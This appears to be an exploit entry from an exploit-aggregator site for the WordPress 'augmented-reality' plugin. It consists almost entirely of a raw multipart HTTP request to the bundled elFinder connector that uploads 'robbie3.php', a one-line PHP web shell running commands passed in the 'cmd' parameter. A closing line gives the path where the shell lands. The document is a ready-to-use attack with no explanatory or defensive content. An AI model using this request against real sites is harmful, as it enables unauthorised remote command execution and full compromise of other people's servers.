Share
## https://sploitus.com/exploit?id=WPEX-ID:10457
POST /wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 192.168.1.134
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42474892822150178483835528074
Content-Length: 737
Connection: close
Cookie: PHPSESSID=8940b45029f28b38e8339bae4dd10b18
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="reqid"
1744f7298611ba
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="cmd"
upload
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="target"
l1_Lw
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="upload[]"; filename="robbie3.php"
Content-Type: application/php
<?php system($_GET['cmd']); ?>
-----------------------------42474892822150178483835528074
Content-Disposition: form-data; name="mtime[]"
1597850374
-----------------------------42474892822150178483835528074--
```
File ends up
/wp-content/plugins/augmented-reality/file_manager/robbie3.php